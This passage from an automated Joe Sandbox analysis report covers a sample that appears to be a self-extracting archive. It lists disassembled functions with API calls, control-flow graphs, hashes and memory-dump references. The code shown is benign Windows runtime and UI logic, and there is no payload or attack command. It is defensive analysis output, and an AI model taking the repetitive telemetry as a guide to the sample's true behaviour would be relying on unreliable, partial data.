                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                    • String ID:
                                                                                                    • API String ID: 1999340476-0
                                                                                                    • Opcode ID: 6ee3f87c0406e31b98b11aed1ad12ebaa12eed00430c252e544e33997e5d59cd
                                                                                                    • Instruction ID: 184a6ffafe50ed492e5f91ad542a939213cc3274b7a0a0bd4ecb3f51126e066e
                                                                                                    • Opcode Fuzzy Hash: 6ee3f87c0406e31b98b11aed1ad12ebaa12eed00430c252e544e33997e5d59cd
                                                                                                    • Instruction Fuzzy Hash: 903113305443456FE7309F24CC4ABDABBD4BB84324F501B19F9E1A61D3D3A4A9C8CB91
                                                                                                    Function 00E1B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1059 e1b568-e1b581 PeekMessageW 1060 e1b583-e1b597 GetMessageW 1059->1060 1061 e1b5bc-e1b5be 1059->1061 1062 e1b599-e1b5a6 IsDialogMessageW 1060->1062 1063 e1b5a8-e1b5b6 TranslateMessage DispatchMessageW 1060->1063 1062->1061 1062->1063 1063->1061
                                                                                                    APIs
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
                                                                                                    • IsDialogMessageW.USER32(00010420,?), ref: 00E1B59E
                                                                                                    • TranslateMessage.USER32(?), ref: 00E1B5AC
                                                                                                    • DispatchMessageW.USER32(?), ref: 00E1B5B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1266772231-0
                                                                                                    • Opcode ID: 933777c322a7c68383917476257cfd1dd9555747536e18cce9cc8d2ea5398ba7
                                                                                                    • Instruction ID: 5a52916d3527be2c59bf060401b7b7bc9a9f41ad47565b6a6e4a2aa437f42ab8
                                                                                                    • Opcode Fuzzy Hash: 933777c322a7c68383917476257cfd1dd9555747536e18cce9cc8d2ea5398ba7
                                                                                                    • Instruction Fuzzy Hash: 86F0B771A0122AAF8B20ABF6AD4CDDB7FADEF062957004415F919E2010EB74D64DCBB0
                                                                                                    Function 00E1ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1064 e1abab-e1abca GetClassNameW 1065 e1abf2-e1abf4 1064->1065 1066 e1abcc-e1abe1 call e11fbb 1064->1066 1068 e1abf6-e1abf9 SHAutoComplete 1065->1068 1069 e1abff-e1ac01 1065->1069 1071 e1abf1 1066->1071 1072 e1abe3-e1abef FindWindowExW 1066->1072 1068->1069 1071->1065 1072->1071
                                                                                                    APIs
                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00E1ABC2
                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00E1ABF9
                                                                                                      • Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1
                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E1ABE9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                    • String ID: EDIT
                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                    • Opcode ID: 63d321086c0ea8525346fa107c9d82a2338199559efed79efcc6d7cdc1a7c595
                                                                                                    • Instruction ID: 22d3c91cb6a9df5b62f8935e52b4b0854e4949087ab9524d3b590ea47b6488d6
                                                                                                    • Opcode Fuzzy Hash: 63d321086c0ea8525346fa107c9d82a2338199559efed79efcc6d7cdc1a7c595
                                                                                                    • Instruction Fuzzy Hash: B8F082327012287ADB205625AC09FEB76AC9F46B40F485062FA05B21C0D7A0EA8985B6
                                                                                                    Function 00E1DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1073 e1dbde-e1dc09 call e1ec50 SetEnvironmentVariableW call e10371 1077 e1dc0e-e1dc12 1073->1077 1078 e1dc14-e1dc18 1077->1078 1079 e1dc36-e1dc38 1077->1079 1080 e1dc21-e1dc28 call e1048d 1078->1080 1083 e1dc1a-e1dc20 1080->1083 1084 e1dc2a-e1dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1079
                                                                                                    APIs
                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E1DBF4
                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E1DC30
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentVariable
                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                    • Opcode ID: 65b598635453dbf24de7b545792e54a308330420bc418626fab67eb930e6052c
                                                                                                    • Instruction ID: e0fdcfa3f093b0176ed6269aa8af0a294ba4a28220c7e7c9586d959544d3f7e3
                                                                                                    • Opcode Fuzzy Hash: 65b598635453dbf24de7b545792e54a308330420bc418626fab67eb930e6052c
                                                                                                    • Instruction Fuzzy Hash: B4F0A7B2405228AACB202B958C0AFFA7B98AF04781B041811BD85B5151D6F489C0D6E0
                                                                                                    Function 00E09785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1085 e09785-e09791 1086 e09793-e0979b GetStdHandle 1085->1086 1087 e0979e-e097b5 ReadFile 1085->1087 1086->1087 1088 e09811 1087->1088 1089 e097b7-e097c0 call e098bc 1087->1089 1090 e09814-e09817 1088->1090 1093 e097c2-e097ca 1089->1093 1094 e097d9-e097dd 1089->1094 1093->1094 1095 e097cc 1093->1095 1096 e097ee-e097f2 1094->1096 1097 e097df-e097e8 GetLastError 1094->1097 1098 e097cd-e097d7 call e09785 1095->1098 1100 e097f4-e097fc 1096->1100 1101 e0980c-e0980f 1096->1101 1097->1096 1099 e097ea-e097ec 1097->1099 1098->1090 1099->1090 1100->1101 1103 e097fe-e09807 GetLastError 1100->1103 1101->1090 1103->1101 1105 e09809-e0980a 1103->1105 1105->1098
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00E09795
                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00E097AD
                                                                                                    • GetLastError.KERNEL32 ref: 00E097DF
                                                                                                    • GetLastError.KERNEL32 ref: 00E097FE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2244327787-0
                                                                                                    • Opcode ID: 86b23a795dc3515cf6c1c3a1c0818bc49a55f11b08bfa61a2bece47b7b2a2a06
                                                                                                    • Instruction ID: 41aee71baa53f36914a404624b4c64e55c66ca3c59abd33f3740cd7965693e3c
                                                                                                    • Opcode Fuzzy Hash: 86b23a795dc3515cf6c1c3a1c0818bc49a55f11b08bfa61a2bece47b7b2a2a06
                                                                                                    • Instruction Fuzzy Hash: CE11C232910204EBCF245F75C804AA93BA9FB42324F10D62AF456B52D3D7748EC4DB61
                                                                                                    Function 00E2AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E240EF,00000000,00000000,?,00E2ACDB,00E240EF,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue), ref: 00E2AD66
                                                                                                    • GetLastError.KERNEL32(?,00E2ACDB,00E240EF,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue,00E37970,FlsSetValue,00000000,00000364,?,00E298B7), ref: 00E2AD72
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E2ACDB,00E240EF,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue,00E37970,FlsSetValue,00000000), ref: 00E2AD80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: df347b2add02bc7f331d78dc802c422da9fa60ab0949ac4006b5f00c2fbe1c9f
                                                                                                    • Instruction ID: 3deb57d75613cfe8c223ef9f54e3f146011026130a3a313ce0f3051366c66af4
                                                                                                    • Opcode Fuzzy Hash: df347b2add02bc7f331d78dc802c422da9fa60ab0949ac4006b5f00c2fbe1c9f
                                                                                                    • Instruction Fuzzy Hash: 1501D43620123AAFC7314F79BC48E977F98AF457AB7191630F906F7560D720D8058AE1
                                                                                                    Function 00E2BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E297E5: GetLastError.KERNEL32(?,00E41098,00E24674,00E41098,?,?,00E240EF,?,?,00E41098), ref: 00E297E9
                                                                                                      • Part of subcall function 00E297E5: _free.LIBCMT ref: 00E2981C
                                                                                                      • Part of subcall function 00E297E5: SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E2985D
                                                                                                      • Part of subcall function 00E297E5: _abort.LIBCMT ref: 00E29863
                                                                                                      • Part of subcall function 00E2BB4E: _abort.LIBCMT ref: 00E2BB80
                                                                                                      • Part of subcall function 00E2BB4E: _free.LIBCMT ref: 00E2BBB4
                                                                                                      • Part of subcall function 00E2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E2BA44,?), ref: 00E2B7E6
                                                                                                    • _free.LIBCMT ref: 00E2BA9F
                                                                                                    • _free.LIBCMT ref: 00E2BAD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                    • String ID: p
                                                                                                    • API String ID: 2991157371-2678736219
                                                                                                    • Opcode ID: 1fdba823028caba7a3c35c6185c24bef4ade103c66ca40b66a17e99a3666f49a
                                                                                                    • Instruction ID: 535c6cfac8ea7e88287c51ce57dd4fc963ba1283a0bdcbaad235eee0ca1f1046
                                                                                                    • Opcode Fuzzy Hash: 1fdba823028caba7a3c35c6185c24bef4ade103c66ca40b66a17e99a3666f49a
                                                                                                    • Instruction Fuzzy Hash: 3131F971904229AFDB10DFA9E945B9DBBF5FF40324F215099E404BB2A2EB325D44DB50
                                                                                                    Function 00E1101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00E11043
                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00E1108A
                                                                                                      • Part of subcall function 00E06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E06C54
                                                                                                      • Part of subcall function 00E06DCB: _wcschr.LIBVCRUNTIME ref: 00E06E0A
                                                                                                      • Part of subcall function 00E06DCB: _wcschr.LIBVCRUNTIME ref: 00E06E19
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                    • String ID: CreateThread failed
                                                                                                    • API String ID: 2706921342-3849766595
                                                                                                    • Opcode ID: f8d3f758dab7de0b954977011d9523893a0fe6b966f82e579d9db40c09ba1198
                                                                                                    • Instruction ID: 3d366d0c968d54b6f8fc336ca6f4dda46e7a719fffd7e0ef6b1b8d96b11bd034
                                                                                                    • Opcode Fuzzy Hash: f8d3f758dab7de0b954977011d9523893a0fe6b966f82e579d9db40c09ba1198
                                                                                                    • Instruction Fuzzy Hash: 9001DBB53443096FD734AE64AC96FB6B798EB44751F10106EF687761C0CAA168C58624
                                                                                                    Function 00E1E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: ($PDu<
                                                                                                    • API String ID: 1269201914-2719109745
                                                                                                    • Opcode ID: 49a62b1c3d7b6a2eab25cee00a97ed6a902ef012411f5ad2abb567204b399fbc
                                                                                                    • Instruction ID: 37f53b912e062228ba8e63f134be7f13e2ba06ee2a569e0095013d93f6c1f832
                                                                                                    • Opcode Fuzzy Hash: 49a62b1c3d7b6a2eab25cee00a97ed6a902ef012411f5ad2abb567204b399fbc
                                                                                                    • Instruction Fuzzy Hash: C0B012E12981407C314852182D07CBB094EC4C1F20330B02EFC04F0680E8804C860631
                                                                                                    Function 00E1E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
